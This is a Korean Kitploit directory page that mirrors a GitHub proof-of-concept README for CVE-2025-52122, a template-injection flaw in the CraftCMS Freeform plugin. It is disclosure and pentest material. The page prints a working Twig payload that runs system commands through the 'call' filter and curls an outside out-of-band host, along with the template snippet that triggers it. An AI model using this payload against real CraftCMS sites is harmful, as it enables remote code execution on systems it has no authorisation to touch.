Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-52122 — CraftCMS Freeform 5.0.0 < 5.10.16의 임의 코드 주입 | Kitploit
도구/GitHubGitHub/timtrademark/cve-2025-52122
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtimtrademark/cve-2025-52122

CVE-2025-52122

CraftCMS Freeform 5.0.0 < 5.10.16의 임의 코드 주입

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE CraftCMS Freeform

CraftCMS Freeform에는 SSTI 취약점이 포함되어 있어, 폼(제출 제목) 편집 권한이 있는 모든 사용자가 임의 코드를 삽입할 수 있습니다.

취약한 버전은 v5.0.0 < v5.10.16입니다.

재현 단계

폼을 생성합니다:

create a form

저는 개념 증명으로 여기에 "pentest"라는 폼을 생성했습니다. 다음으로, 설정에서 다음 제출 제목을 설정합니다 (도메인 이름을 자신의 서버로 변경):

root@kitploit:~
{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

submission title

이렇게 하면 임의의 시스템 호출이 실행됩니다. 이 경우, 들어오는 연결이 있는지 알려주는 제어 서버로 curl을 수행합니다. 다음으로, 이 폼을 템플릿/페이지에 포함하고 제출합니다:

root@kitploit:~
<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

이렇게 하면 curl 명령이 호출됩니다. 생성된 수신 HTTP 요청을 확인하여 이를 검증할 수 있습니다:

incoming connection

이 문제의 근본 원인은 Freeform이 사용자 입력을 검증하지 않고 "call" Twig 필터를 구현하기 때문입니다. 이는 다음 커밋에서 수정되었습니다.

도구 다운로드